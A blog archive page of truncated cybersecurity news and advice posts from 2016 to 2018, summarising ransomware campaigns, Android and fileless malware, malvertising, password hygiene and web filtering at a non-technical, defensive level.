obtaining sensitive information by deception, such as impersonating a company in an attempt to obtain login credentials or to fool employees into making wire transfers to bank accounts controlled by criminals. A spam filter can prevent the majority of...
by G Hunt |
June 27, 2018 |
Cybersecurity Advice, Cybersecurity News
The biggest cybersecurity risk for businesses in the United States is employee negligence, according to a recent Shred-It survey of 1,000 small business owners and C-suite executives. The findings of the survey, detailed in its North America State of the Industry Report, show the biggest cybersecurity risk for businesses is human error such as the accidental loss of data or devices containing sensitive company information. 84% of C-Suite executives and 51% of small business owners said employee negligence was the biggest cybersecurity risk for their business. 42% of small business owners and 47% of C-suite executives said employee negligence was the leading cause of cybersecurity breaches. Employees are the Biggest Cybersecurity Risk for Businesses in the United States Employees often cut corners in order to get more done in their working day and take considerable security risks. Even though laptop computers can contain highly sensitive information and allow an unauthorized individual to gain access to a work network, around a quarter of U.S employees leave their computer unlocked and unattended. Documents containing sensitive information are often left unattended in full view of individuals who are not authorized to view the information. The risks taken by employees are greater when working remotely, such as in coffee shops or at home. 86% of executives and SBOs said remote workers were much more likely to cause data breaches. 88% of C-suite executives and 48% of small business owners said they have implemented flexible working models that allow their employees to spend at least some of the week working off site. A survey conducted on behalf of the Switzerland-based serviced office provider IWG suggests that globally, 70% of workers spend at least one day a week working remotely, while 53% work remotely for at least half of the week. Adoption of these flexible working practices is increasing, although cybersecurity policies are not being implemented that specifically cover remote workers. Even though a high percentage of workers are spending at least some of the week working remotely, the Shred-It survey shows that more than half of SMBs do not have policies...
by G Hunt |
December 20, 2017 |
Cybersecurity Advice, Cybersecurity News
Loapi malware is a new Android malware variant that is capable of causing permanent damage to Android smartphones. The new malware variant was recently discovered by researchers at Kaspersky Lab. In contrast to many new malware variants that operate silently and remain on the device indefinitely, Loapi malware infections can be short-lived. Kaspersky performed a test on an Android phone and discovered that within two days the phone had been destroyed. The aim of the malware is not sabotage. Destruction of the device is just collateral damage that results from the intense activity of the malware. Loapi malware performs a wide range of malicious functions simultaneously, including some processor-intensive activities that cause the device to overheat, causing irreparable damage. In the test, over the two days, the constant activity caused the device to overheat and the battery to bulge; deforming the device and its cover. The researchers said Loapi malware is likely no other malware variant they have seen, and the researchers have seen plenty. Loapi malware was called a ‘jack of all trades’ due to its extensive capabilities. The malware is used to mine the cryptocurrency Monero, a processor-intensive process. The malware uses processing power of infected devices to create new coins. While the mining process is less intensive than for Bitcoin, it still takes its toll. Additionally, the malware allows infected devices to be used in DDoS attacks, making constant visits to websites to take down online services. The malware is used to spam advertisements, and bombards the user with banners and videos The malware will silently subscribe to online services, and if they require text message confirmation, that is also handled by the malware. The malware gains access to SMS messages and can send text messages to any number, including premium services. Text messages are used to communicate with its C2 server. Messages are subsequently deleted by the malware to prevent detection by the user, along with any text message confirmations of subscriptions to online services. Kaspersky Lab researchers note that the malware attempted to access more than 28,000 URLs in the two days...
by G Hunt |
November 17, 2017 |
Cybersecurity Advice, Cybersecurity News
A malware threat called LockCrypt ransomware is being used in widespread attacks on businesses in the United States, United Kingdom, and South Africa. While ransomware is commonly spread via spam email, this campaign spreads the file-encrypting malware via remote desktop protocol brute force attacks. The LockCrypt ransomware attacks were first detected in June this year, but over the past few months the number of attacks has increased significantly, with October seeing the highest number of attacks so far this year. LockCrypt ransomware is a relatively new malware variant, having first been seen in June 2017. Once infected, users will be unable to access their files. This ransomware variant uses RSA-2048 and AES-256 cryptopgraphy, which makes it virtually impossible to recover files without paying the ransom demand if a viable backup does not exist. To make recovery more difficult, LockCrypt ransomware also deletes Windows Shadow Volume copies. Encrypted files are given the .lock extension. The ransom payment for this campaign is considerable – typically between 0.5 and 1 Bitcoin per encrypted server. That’s between $3,963 and $7,925 per compromised server; however, since the same login credentials are often used for RDP access on multiple servers, once one password is correctly guessed, it can be used to access multiple servers and deploy LockCrypt ransomware. One of the Bitcoin addresses used by the attackers shows one company paid a ransom of $19,000 to recover files on three of its servers. Once access to a server is gained, ransomware is deployed; however, the attackers are manually interacting with compromised servers. AlientVault security researcher, Chris Doman, reported that for one company, in addition to deploying ransomware, the attackers “manually killed business critical processes for maximum damage.” All non-core processes on an infected server are killed. The attacks do not appear to be targeted, instead they are randomly conducted on business servers. Businesses that are most likely to have ransomware installed are those that have failed to use complex passwords for RDP access. While it may be tempting to set an easy-to-remember password,...
by G Hunt |
September 27, 2017 |
Cybersecurity Advice, Cybersecurity News
Email may be the primary vector used in phishing attacks, but the second quarter of 2017 has seen a massive increase in malvertising phishing attacks. Malvertising is the term given to malicious adverts, which are often displayed on high-traffic websites via third party advertising networks. These adverts are used to direct web visitors to malicious websites, oftentimes sites containing exploit kits that probe for vulnerabilities and silently download ransomware and other malware. These malware attacks increased between 2015 and 2016, with the total number of malvertising attacks rising by 136%. Demonstrating how quickly the threat landscape changes, between Q1 and Q2, 2017 there was a noticeable decline in malicious advert-related exploit kit and malware attacks. Exploit kit redirects fell by 24% and malware-related adverts fell by almost 43%, according to a recent study released by RiskIQ. However, the study shows there was a massive increase in malvertising phishing attacks with cybercriminals changing their tactics. Phishing-related adds increased by 131% in Q2, 2017, but between 2015 and 2016, malvertising phishing attacks increased by a staggering 1,978%. The websites that these adverts direct users to often promise a free gift in exchange for taking part in a survey. Genuine market research firms tend not to offer large incentives for taking part in surveys, or when they do offer an incentive, participants are entered into a draw where they stand a chance of winning a prize. When gifts are offered, to all participants it is a warning sign that all may not be as it seems. That said, many people still fall for the scams. The aim of the surveys is to obtain sensitive information such as bank account information, Social Security numbers, usernames, passwords and personal information. The information can be used for a wide range of nefarious purposes. It is not only personal information that is sought. Cybercriminals are keen to gain access to corporate email accounts for the data they contain and to use them to send phishing emails. When phishing attacks occur through corporate email accounts it can seriously tarnish a company’s reputation and may result in...
by G Hunt |
September 27, 2017 |
Cybersecurity Advice, Cybersecurity News
Why should businesses invest heavily in technology to detect ransomware attacks when a ransom payment may only be between $500 and $1,000? While that is what cybercriminals are charging as a ransom, the cost of a ransomware attack is far higher than any ransom payment. In fact, the ransom is often one of the lowest costs of a ransomware attack that businesses must cover. The ransom payment may seem relatively small, although the latest ransomware variants are capable of spreading laterally, infecting multiple computers, servers and encrypting network shares. The ransom payment is multiplied by the number of devices that have been infected. The Cost of a Ransomware Attack Can Run to Millions of Dollars When businesses suffer ransomware attacks, the attackers often set their ransoms based on the perceived ability of the organization to pay. In 2016, Hollywood Presbyterian Medical Center was forced to pay a ransom of $19,000 to unlock its infection. When the San Francisco Muni was infected, hackers demanded $50,000 for the keys to unlock its payment system. In June 2017, South Korean web host Nayana agreed to pay $1 million for the keys to unlock the encryption of its 53 Linux servers and 3,400 customer websites. These ransom payments are high, but the ransom is only one cost of a ransowmare attack. The biggest cost of a ransomware attack is often the disruption to business services while files are taken out of action. Systems can be taken out of action for several days, bringing revenue generating activities to an abrupt stop. One Providence law firm experienced downtime of three months following a ransomware attack, even though the $25,000 ransom was paid. Lawyers were stopped from working, causing a loss in billings of an estimated $700,000. In heavily regulated industries, notifications must be sent to all individuals whose information has been encrypted, and credit monitoring and identity theft services often need to be provided. When hundreds of thousands of users’ data is encrypted, the cost of printing and mailing notifications and paying for credit monitoring services is substantial. Once an attack has been resolved, networks need to be analyzed to...
by G Hunt |
August 24, 2017 |
Cybersecurity Advice, Cybersecurity News
The Neptune Exploit kit is being used to turn computers into cryptocurrency miners, with traffic directed to the exploit kit using a hiking-themed malvertising campaign. Exploit kit activity has fallen this year, although these web-based attacks still pose a significant threat. Exploit kits are web-based toolkits that probe browsers and plugins for vulnerabilities that can be exploited to download malware. Simply visiting a website hosting an exploit kit is all it takes for malware to be silently downloaded. Protecting against exploit kit attacks requires browsers, plugins and extensions to be kept 100% up to date. However, even updated browsers can be vulnerable. Exploit kits can also include exploits for zero-day vulnerabilities that have not yet been patched. Acceptable usage policies can help organizations to prevent exploit kit attacks, although website visitors are often redirected to malicious sites from legitimate websites. One of the main ways this happens is the use of malvetisements. Many high traffic websites include advertising blocks that display third-party adverts. The advertising networks serve adverts which are displayed on member sites, with the site owners earning money from ad impressions and click throughs. While the advertising networks have measures in place to vet advertisers, oftentimes cybercriminals succeed in submitting malicious adverts. Those adverts are then pushed out and displayed on legitimate websites. Clicking one of those malicious adverts will see the user directed to a webpage hosting the exploit kit. Exploit kits are used to download Trojans, ransomware and other malicious code, although the Neptune exploit kit is being used to download cryptocurrency miners. Infection will see computers’ processing power used to mine the Monero cryptocurrency. Infection will result in the infected computer’s resources being hogged, slowing down the performance of the machine. The latest Neptune exploit kit campaign uses hiking club-related adverts to drive traffic to landing pages hosting the Neptune exploit kit, which in turn uses HTML and Flash exploits to download malware. These adverts closely mimic genuine domains. FireEye reports...
by G Hunt |
August 23, 2017 |
Cybersecurity Advice, Cybersecurity News
India’s Central Board of Secondary Education is urging all CBSE affiliated schools to take action to improve safety for students, including implementing school web filtering technology to keep students safe online. The Internet is home to an extensive range of potentially harmful material that can have a major impact on young developing minds. Parents can take action to keep their children safe at home by using parental control filters. However, students must receive similar or greater levels of protection while at school. School web filtering technology can prevent students from deliberately or accidentally viewing obscene material such as pornography, child pornography or images of child abuse and other categories of potentially harmful website content. CBSE has warned school boards that when students access this material it is “detrimental to themselves, their peers and the value system.” School web filtering technology should also be implemented to prevent students from engaging in illegal activities online via school IT devices. CBSE affiliates schools have been advised to develop guidelines for safe Internet use and make this information available to students and display the rules prominently. However, without school web filtering technology, these policies would be easy to ignore. A technological solution ensures students wishing to engage in illegal activities online, or view harmful website content, will be prevented from doing so. Prevention is only one aspect of Internet control. Schools should also set up a monitoring system to discover when individuals are attempting to bypass Internet usage policies. A web filtering solution should therefore have the capability to generate reports of attempted accessing of prohibited material to allow schools to take action. Schools have also been advised to sensitize parents about safety norms and even go as far as suggesting disciplinary action be taken when children are discovered to have attempted to access inappropriate material. While many school systems around the world have implemented school web filtering technology, CBSE is advising affiliated schools in India to go one step further and restrict...
by G Hunt |
August 11, 2017 |
Cybersecurity Advice
Law firm hacking incidents are up and recent attacks have shown cybersecurity best practices for law firms are not being adhered to. Unless cybersecurity defenses are improved, it is too easy for hackers to gain access to sensitive data. Cybercriminals have their sights firmly set on lawyers, or more specifically, the treasure trove of highly sensitive data stored on their computers and networks. Data that in the wrong hands could be used for blackmail. Clients share highly sensitive information with their legal teams. Lawyers store company secrets, employment contracts and PII, banking details, financial projections, medical records, and naturally information about current and future lawsuits. All of this information is highly valuable to hackers and can be used for blackmail, sold to competitors, or used for all manner of nefarious purposes. It is therefore no surprise that hackers want to attack law firms and that they are increasingly doing just that. Cyberattacks are not only about stealing data. It can also be lucrative to prevent lawyers from gaining access to their clients’ files. Ransomware attacks on law firms can result in sizable payments for the keys to unlock the encryption. For the most part, malware and ransomware attacks on law firms are entirely preventable. Simply adopting standard cybersecurity best practices for law firms will prevent the majority of attacks. One recent ransomware attack on a Providence law firm resulted in a ransom payment of $25,000 being made to the attackers to regain access to the firm’s data. The incident is also a good example of how damaging those attacks can be. Even though payment was made, the law firm lost access to its files for three months, essentially preventing the firm from conducting any business. Lost billings alone cost the firm around $700,000. Malware and ransomware attacks on law firms are common, although they are underreported for obvious reasons. One incident that was covered in the press was the malware attack on DLA Piper. The attack involved NotPetya, the wiper malware that caused chaos for many organizations around the globe in June. DLA Piper lost access to its data causing huge losses....
by G Hunt |
June 26, 2017 |
Cybersecurity Advice, Network Security
Confidence in cyber response plans doesn’t appear to be lacking according to a new study conducted by Deloitte. However, that does not mean organizations are prepared for cyberattacks when they occur. The survey revealed that while confidence is high and IT professionals believe they are well prepared to deal with attacks, their cyber response plans may not be effective. The only way to determine whether cyber response plans will function as planned is to conduct regular tests. If plans are not tested, organizations will not be able to determine with any degree of certainty, if their plans will be effective. As the recent Ponemon Institute Cost of a Data Breach study confirmed, the ability to respond quickly to a data breach can reduce breach resolution costs considerably. For that to happen, a response plan must have been developed prior to the breach being experienced and that plan must be effective. The Deloitte study revealed that 76% of business executives were confident that in the event of a cyberattack they would be able to respond quickly and implement their cyberattack response policies. Yet, the study also revealed that 82% of respondents had not tested their response plans in the past year. They had also not documented their plans with business stakeholders in the past year. A lot can change in a year. New software solutions are implemented, configurations change as do personnel. Only regular testing will ensure that plans work and staff know their roles when an attack occurs. Cyberattack simulations are a useful tool to determine how attack response plans will work in practice. As is often the case, plans look great on paper but often fail when put in place. Running simulations every 6 months will help to ensure that a fast and effective response to a cyberattack is possible. However, the survey showed that only 46% of respondents conduct simulations twice a year or more frequently. A data breach can have dire consequences for a company. The study showed that many companies are most concerned about disruptions to business processes as a result of a cyberattack, although loss of trust and tarnishing of a brand should be of more concern. When a data...
by G Hunt |
April 18, 2017 |
Cybersecurity Advice, Cybersecurity News
A recent insider threat intelligence report from Dtex has revealed the vast majority of firms have employees bypassing security controls put in place to limit Internet activity. Those controls may simply be policies that prohibit employees from accessing certain websites during working hours, or in some cases, Internet filtering controls such as web filtering solutions. Dtex discovered during its risk assessments on organizations that 95% of companies had employees that were using virtual private networks (VPNs) to access the Internet anonymously, with many installing the TOR browser or researching ways to bypass security controls online. The researchers discovered that in some cases, employees were going as far as installing vulnerability testing tools to bypass security controls. Why Are Employees Bypassing Security Controls? Employees bypassing security controls is a major problem, but why is it happening? The report indicates 60% of attacks involve insiders, with 22% of those attacks malicious in nature. During the first week of employment and the final week before an employee leaves, there is the greatest chance of data theft. 56% of organizations said they had discovered potential data theft during those two weeks. During these times there is the greatest risk of employees attempting to bypass security controls for malicious reasons. In many cases, VPNs and anonymizers are used to allow employees to access websites without being tracked. Many companies have policies in place that prohibit employees from accessing pornography in the workplace. Similar policies may cover gaming and gambling websites and other categories of website that serve no work purpose. Some employees choose to ignore those rules and use anonymizers to prevent their organization from having any visibility into their online activities. The report indicates 59% or organizations had discovered employees were accessing pornographic websites at work. There are many reasons why companies prohibit the accessing of pornography at work. It is a drain of productivity, it can lead to the development of a hostile working environment, and from a security standpoint, it is a high-risk activity....
by G Hunt |
April 6, 2017 |
Cybersecurity Advice, Cybersecurity News
Bitdefender has developed a free Bart ransomware decryptor that allows victims to unlock their files without paying a ransom. Bart Ransomware was first detected in June 2016. The ransomware variant stood out from the many others due to its ability to encrypt files even without an Internet connection. Most ransomware variants rely on a connection to their command and control server to generate public-private key pairs; however, Bart ransomware does not. Only the decryption process requires an Internet connection to transfer the ransom payment and receive the decryption key. Bart ransomware posed a significant threat to corporate users. Command and control center communications could potentially be blocked by firewalls preventing encryption of files. However, without any C&C contact, corporate users were at risk. Bart ransomware was believed to have been developed by the gang behind Locky and the Dridex banking Trojan. Bart ransomware shared a significant portion of code with Locky, was distributed in the same manner and used a ransom message very similar to that used by Locky. As with Locky, Bart ransomware encrypted a wide range of file types. While early versions of the ransomware variant were fairly unsophisticated, later versions saw flaws corrected. Early versions of the ransomware variant blocked access to files by locking them in password-protected zip files. The initial method of locking files was ‘cracked’ by AVG, although only by guessing the password using brute force methods. In order for the brute force method to work, a copy of an encrypted file along with its unencrypted original was required. In later versions of the ransomware, the use of zip files was dropped and AVG’s decryption technique was rendered ineffective. The encryption process used in the later versions was much stronger and the ransomware had no known flaws. Until Bitdefender developed the latest Bart Ransomware decryptor, victims had two choices – recover encrypted files from backups or pay the attackers’ ransom demand. Fortunately, Bitdefender was able to create a Bart Ransomware decryptor from keys supplied by Romanian police which were obtained during a criminal...
by G Hunt |
March 30, 2017 |
Cybersecurity Advice, Cybersecurity News
The FBI has issued a cybersecurity warning for healthcare providers on the use of FTP servers. FTP servers should have authentication controls in place to ensure only authorized individuals can access stored data. However, when FTP servers are in anonymous mode, access can be gained with a generic username and password. In some cases, access is possible without a password. The usernames that provide access could be as simple as ‘FTP’ or ‘anonymous’ and lists of usernames can be easily found on the Internet. Cycling through a short list of possible usernames is likely to take seconds or minutes at the most and access to stored data can be gained without any hacking skills. Data stored on an anonymous FTP server could be accessed by anyone. The FBI cybersecurity warning for healthcare providers cites research conducted by the University of Michigan in 2015 that shows the scale of the problem. The study revealed there are more than one million FTP servers in use around the world that allow anonymous access. Any data stored on those servers could be freely accessed by the public. Should those FTP servers contain sensitive data such as protected health information, it could easily be stolen and used for malicious purposes. Firewalls and other perimeter defenses serve to protect networks and EHRs from cyberattacks, yet FTP servers could be a gaping hole in an organization’s defenses. Many healthcare providers use FTP servers to allow data to be easily shared with business associates and other healthcare entities. Yet, if authentication controls are not used they are a data breach waiting to happen. The FBI has warned all medical and dental organizations to ensure that no sensitive data are stored on anonymous FTP servers and advises healthcare organizations to check if their servers are running in anonymous mode. Smaller organizations without the resources of large healthcare systems are more likely to have overlooked this vulnerability; although checks should be performed by all healthcare organizations. The cybersecurity warning for healthcare providers explains the risks extend beyond the theft of sensitive data. If access to the servers can be gained, FTP...
by G Hunt |
March 14, 2017 |
Cybersecurity Advice, Internet Security News
At a recent cybersecurity conference, Director of the FBI, James B. Comey, has given valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused. Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, healthcare providers are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands. However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable. Ransomware can be sent randomly via spam email or distributed by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks and ensuring data can be recovered and business processes can continue if ransomware is installed. In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud. One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond. Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable...
by G Hunt |
March 7, 2017 |
Cybersecurity Advice, Cybersecurity News
A new fileless malware has been detected that uses DNS to receive commands and send information to the attackers’ command and control server. The stealthy communication method together with the lack of files written to the hard drive makes this new malware threat almost impossible to spot. The attack method, termed DNSMessenger, starts with a phishing email, as is the case with many of the new malware threats now being detected. The host is infected via a malicious Word document. Opening the Word document will display a message informing the user that the document has been protected using McAfee Secure. The user is required to enable content to view the document; however, doing so will call a VBA function that defines the Powershell command and includes the malicious code. As is the case with other forms of fileless malware, since no files are written to the hard drive during the infection process, the threat is difficult to detect. Fileless malware are nothing new, in fact they are becoming increasingly common. What makes this threat unique is the method of communication it uses. The malware is able to receive commands via the DNS – which is usually used to look up Internet Protocol addresses associated with domain names. The malware sends and received information using DNS TXT queries and responses. DNS TXT records are commonly used as part of the controls organizations have in place to identify phishing emails and verify the sender of a message – Sender Policy Framework (SPF) and Domain Message Authentication Reporting and Conformance (DMARC). The attackers can send commands to the malware via DNS TXT queries and the malware can send the attackers the output of the commands via the same channel. Even if an organization has blocked outbound DNS for unapproved servers, the malware will still be able to communicate with the attackers C2 infrastructure. While many organizations inspect the contents of web traffic, relatively few inspect the content of DNS requests. The malware is therefore likely to operate unnoticed. Further, the Cisco Talos team that detected the malware reports that only 6/54 AV engines detected the threat, although ClamAV did identify the...
by G Hunt |
February 7, 2017 |
Cybersecurity Advice, Cybersecurity News
Following a massive increase in ransomware attacks, security experts have called for ransomware protection for universities to be augmented Ransomware: A Major Threat to Universities the World Over Ransomware has become one of the biggest data security threats. The healthcare industry has been extensively targeted, as have the financial services, manufacturing, telecoms, and just about every other industry sector. Now, attacks are being conducted on higher education establishments with increased vigor. Universities are attractive targets. They store vast quantities of data. Researchers, teaching staff, and students alike need access to data on a daily basis. Without access, all work grinds to a halt. That means ransom demands are likely to be paid. Secondly, universities use thousands of computers and have tens of thousands of users. Cybersecurity defenses may be good, but with so many individuals with access to Internet facing computers, protecting against targeted attacks on those individuals is a major challenge. Staff and students are being actively targeted as they are the weak links in the security chain. Then there is the issue of academic freedom. While many industries have implemented web filtering solutions to limit the websites that can be visited by staff and students, many universities have been reluctant to restrict Internet access. In a similar vein, university networks tend to be more open than in the business world for example. Businesses tend to severely restrict access to networks. If an attack occurs, the damage is very limited. Open networks tend to result in huge numbers of files and devices being encrypted if an attacker breaks through the security perimeter. Ransomware Protection for Universities Clearly Lacking The number of university ransomware attacks that have been reported by institutions in the United States and Canada in 2016 has reached alarming levels. Many of those universities have been forced to pay the ransom demands to restore access to files. Last year, the University of Calgary was forced to pay $16,000 to restore access after a ransomware attack. Carleton University was also attacked with ransomware, as was Los Angeles...
by G Hunt |
January 31, 2017 |
Cybersecurity Advice, Network Security
Poor cybersecurity practices exist at many US organizations, which are allowing hackers and other cybercriminals to gain access to corporate networks, steal data, and install malware and ransomware. Businesses can implement highly sophisticated cybersecurity defenses, but even multi-million-dollar cybersecurity protections can be easily bypassed if poor cybersecurity practices persist. This month we have seen two reports issued that have highlighted one of the biggest flaws in cybersecurity defenses in US enterprises. Poor password hygiene. The purpose of passwords is to prevent unauthorized access to sensitive data, yet time and again we have seen data breaches occur because of end users’ poor choice of passwords and bad password practices. Earlier this month, SplashData released its annual report on the worst passwords of 2016. The report details the top 25 poorly chosen passwords. This year’s report showed that little had changed year on year. Americans are still very bad at choosing strong passwords. Top of this year’s list of the worst passwords of 2016 were two absolute howlers: 123456 and password. Number three and four were no better – 12345 and 12345678. Even number 25 on the list – password1 – would likely only delay a hacker by a few seconds. Another study also highlighted the extent to which Americans practice poor password hygiene. Pew Research asked 1,040 US adults about their password practices. 39% of respondents said they used the same passwords – or very similar passwords – for multiple online accounts, while 25% admitted to using very simple passwords because they were easier to remember. 56% of 18-29-year-old respondents said that they shared their passwords with other individuals, while 41% of all respondents said they shared passwords with family members. The results of this survey were supported by later research conducted by Telsign, who found a very blasé attitude to online security among U.S. citizens. Although 80% of respondents admitted to being concerned about online security (and half of those claimed to have had an online account hacked in the past year), 73% of respondents´ online accounts are guarded by duplicate passwords and...
by G Hunt |
January 20, 2017 |
Cybersecurity Advice, Internet Security News
There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm. However, there is another reason why the use of web filters in libraries is important. This has been clearly demonstrated this week in St. Louis, MO. Web Filters in Libraries are Not Only About Internet Control This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but do little else. All book borrowing stopped since it is not possible to for library staff to log borrowing on the checkout system. Patrons have also been prevented from gaining access to the Internet. Even the email system has been locked and taken out of action. What kind of computer malfunction causes the entire network of computers to stop working? The answer is ransomware. Ransomware is malicious software that has been developed with one sole purpose: To encrypt system and data files to prevent access. Once downloaded, ransomware locks files with powerful encryption preventing files from being accessed. The attacker then sends a ransom demand offering the unique keys to decrypt files in exchange for payment. Typically, attackers demand $500 in an anonymous currency such as Bitcoin to unlock each computer that has been attacked. In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library systems’ computers – across 16 locations – were attacked and encrypted. Some ransomware variants also act as information stealers. Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen. The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only...
by G Hunt |
January 17, 2017 |
Cybersecurity Advice
If you use a computer, you are at risk of having your device infected with malware; however, listed below are some useful tips for preventing malware infections. Unfortunately, signature-based anti-malware software is far less effective at preventing infections than in years gone by. Malware developers are now using a wide range of strategies and techniques to prevent traditional anti-malware solutions from detecting and blocking infections. Rely on anti-malware or anti-virus software alone and sooner or later you may find your device has been compromised, your keystrokes are being logged, and your – or your organization’s – data are being stolen. However, there are some straightforward strategies that you can adopt to prevent malware infections and keep your computer, and your network, malware-free. 10 Tips for Preventing Malware Infections Backup Your data OK, a data backup will not prevent a malware infection, but it can help you recover if your computer is infected with ransomware or if your data are corrupted as a result of an infection – or removal of malware. The only way to recover from some infections is to wipe out your system and restore it from a previously known safe point. You must therefore have a safe point that you can use. Nightly backups should be performed. You only then stand to lose 24 hours of data at most. Keep your malware definitions up to date Anti-malware software may not be as effective as it once was, but you do need to give it a fighting chance. If you do not keep your definitions 100% up to date you are asking for trouble. This may sound obvious, but many organizations delay updating malware definitions for forget to set software to update automatically on all devices. Never click on links or open email attachments from unknown senders Cybercriminals target employees as it is far easier to gain access to a corporate network if an employee bypasses their organization’s defences and installs malware. All it takes is for one employee to install malware for attackers to gain a foothold in a network. Ensure that all employees receive anti-phishing training and have at least basic IT security skills. Most data breaches start...
by G Hunt |
December 30, 2016 |
Cybersecurity Advice, Network Security
Cybercriminals have embraced ransomware and have been increasingly targeting businesses, yet many business leaders are unsure how to prevent ransomware attacks. Consequently, the risk from ransomware is not being effectively managed, and that may prove costly. Ransomware is a form of malware that is capable of encrypting files on local machines, network drives, and servers. Any computer that is connected to the Internet can potentially be infected. Even without internet access, files may be encrypted if a computer is networked. The latest ransomware variants are capable of spreading laterally within a network and encrypting the data on hundreds of devices. Files required for critical business processes may be encrypted and made inaccessible. A successful attack can result in a company’s operations grinding to a halt. A healthcare ransomware attack can result in patients’ health information becoming inaccessible. An attack on a pharmaceutical company may result in files necessary for drug manufacture being locked, which could affect the quality of products. Lawyers offices may lose essential client information. Few businesses could continue to operate at their full potential during a ransomware attack. The loss of files can prove extremely expensive, far less than the cost of any ransom payment. Many companies therefore are left with little alternative but to pay the ransom demand. Ransom payments are actually made surprisingly frequently. According to a recent study conducted by IBM, 70% of businesses that experienced a ransomware infection ended up paying the attackers to supply the keys to unlock their data. Half of those businesses paid more than $20,000 while 20% paid more than $40,000. Even when the ransom is paid there is no guarantee that a viable key will be supplied to unlock the encryption. Files may therefore be lost forever. One healthcare organization in the United States recently discovered that files can all too easily be lost forever. Three months after ransomware was installed on one of its servers and critical patient health information was encrypted, Desert Care Family and Sports Medicine has still not been able to unlock the encryption nor...
by G Hunt |
October 14, 2016 |
Cybersecurity Advice, Web Filtering
There are a number of reasons why ransomware attacks have been increasing and why the crypto-ransomware has now become one of the biggest and most worrying threats. However, the main reason is ransomware is extremely profitable. How profitable? According to a recent security report from McAfee Labs, one single ransomware author managed to pull in an incredible $121 million in ransomware payments in the first six months of 2016. Take off the expenses incurred and the author cleared $94 million in profit. That was just one author. There are many. There are now more than 200 different ransomware families and many more variants of each. Fortunately, developing new ransomware is a complicated business that requires considerable programming skill. Unfortunately, there are many individuals who rent ransomware to conduct campaigns and take a cut of the profits. The explosion in use of ransomware in the past two years is a cause for concern for all Internet users, especially for business owners. Unfortunately, the ransomware crisis is unlikely to be resolved any time soon. As long as it is profitable, the attacks will continue. Vincent Weafer, VP of Intel Security’s McAfee Labs, expects the revenues from ransomware infections in 2016 will be of the order of several hundreds of millions of dollars and most likely considerably more. McAfee recorded 1.3 million new ransomware samples in the first half of 2016. The risk of infection with ransomware has increased as authors employ increasingly sophisticated methods of evading detection. Ransomware is also spreading faster and encrypting even more data to ensure victims have no alternative but to pay up. But how is it possible to prevent ransomware attacks? Unfortunately, there is no silver bullet. Prevention requires several different strategies to be adopted. To prevent ransomware attacks, check out the ransomware protection tips below. Ransomware Protection Tips We have listed some ransomware protection tips below that will help you to avoid ransomware infections – And how to avoid paying a ransom should the unthinkable happen. The first rule of ransomware avoidance is backing up your data The no More Ransom Project...
by G Hunt |
June 9, 2016 |
Cybersecurity Advice, Cybersecurity News
The security threat from bloatware was made abundantly clear last year with the discovery of a Lenovo bloatware vulnerability, affecting the Superfish Adware program that came pre-installed on Lenovo laptops. Bloatware is a term used to describe software applications and programs that are largely unnecessary, yet are pre-installed on new computer and laptops. The software programs can slow down computers and take up a lot of memory, yet offer the user little in the way of benefits. They are primarily used to update application features rather than to enhance security. Unfortunately, these pre-installed programs have been discovered – on numerous occasions – to contain security vulnerabilities that can be exploited by malicious actors and used for man-in-the-middle attacks. They can even let attackers run arbitrary code, allow privilege escalation, or perform malicious software updates. Now a new Lenovo bloatware vulnerability has been uncovered. This time it concerns the company’s software updater which has been found to contain a vulnerability that could potentially be exploited allowing man-in-the-middle attacks to be conducted. New Bloatware Vulnerability Found in Lenovo Accelerator Application Updater: Uninstall Recommended The Lenovo Accelerator Application has been pre-installed on a wide range of desktop computers and notebooks shipped pre-installed with Windows 10. In total, well over 100 different models of Lenovo notebooks and desktops have the Lenovo Accelerator Application installed. Lenovo says the application is used to speed up the launching of Lenovo applications and communicates with the company’s servers to determine whether application updates exist. The UpdateAgent pings Lenovo’s servers every 10 minutes to check whether updates have been released. However, the application has recently been discovered to contain a security vulnerability that could be exploited by attackers. DuoLabs investigated a number of companies to check for security vulnerabilities in pre-installed software applications and found that Lenovo’s UpdateAgent was particularly vulnerable to attacks. DuoLabs reported that the updater had “no native security,” and that...
by G Hunt |
June 7, 2016 |
Cybersecurity Advice, Cybersecurity News
